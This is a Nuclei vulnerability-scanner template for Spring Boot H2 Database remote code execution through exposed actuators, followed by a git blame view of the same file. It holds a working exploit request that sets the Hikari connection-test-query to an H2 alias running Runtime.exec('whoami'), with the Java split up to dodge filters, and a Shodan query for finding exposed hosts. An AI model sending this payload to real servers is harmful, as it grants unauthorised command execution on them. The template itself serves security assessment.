nuclei-templates/vulnerabilities/springboot/springboot-h2-db-rce.yaml

id: springboot-h2-db-rce

info:
  name: Spring Boot H2 Database RCE
  author: dwisiswant0
  severity: critical
  tags: springboot,rce,jolokia
  reference:
    - https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database
    - https://twitter.com/pyn3rd/status/1305151887964946432
    - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
    - https://github.com/spaceraccoon/spring-boot-actuator-h2-rce
  metadata:
    shodan-query: http.favicon.hash:116323821

requests:
  - raw:
      - |
        POST /actuator/env HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "name":"spring.datasource.hikari.connection-test-query",
          "value":"CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('whoami');"
        }

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '"spring.datasource.hikari.connection-test-query":"CREATE ALIAS EXEC AS CONCAT'
:fire: Add Spring Boot H2 Database RCE 2020-09-13 15:33:07 +00:00			`id: springboot-h2-db-rce`

			`info:`
			`name: Spring Boot H2 Database RCE`
			`author: dwisiswant0`
			`severity: critical`
Added missing tags 2021-11-27 22:43:45 +00:00			`tags: springboot,rce,jolokia`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Expose references 2021-05-02 06:19:55 +00:00			`- https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database`
			`- https://twitter.com/pyn3rd/status/1305151887964946432`
			`- https://www.veracode.com/blog/research/exploiting-spring-boot-actuators`
			`- https://github.com/spaceraccoon/spring-boot-actuator-h2-rce`
misc update 2021-11-02 21:24:23 +00:00			`metadata:`
			`shodan-query: http.favicon.hash:116323821`
:fire: Add Spring Boot H2 Database RCE 2020-09-13 15:33:07 +00:00
			`requests:`
misc update 2021-11-02 21:24:23 +00:00			`- raw:`
			`- \|`
			`POST /actuator/env HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/json`

			`{`
			`"name":"spring.datasource.hikari.connection-test-query",`
			`"value":"CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('whoami');"`
			`}`

:fire: Add Spring Boot H2 Database RCE 2020-09-13 15:33:07 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
misc update 2021-11-02 21:24:23 +00:00
:fire: Add Spring Boot H2 Database RCE 2020-09-13 15:33:07 +00:00			`- type: word`
			`part: body`
			`words:`
misc update 2021-11-02 21:24:23 +00:00			`- '"spring.datasource.hikari.connection-test-query":"CREATE ALIAS EXEC AS CONCAT'`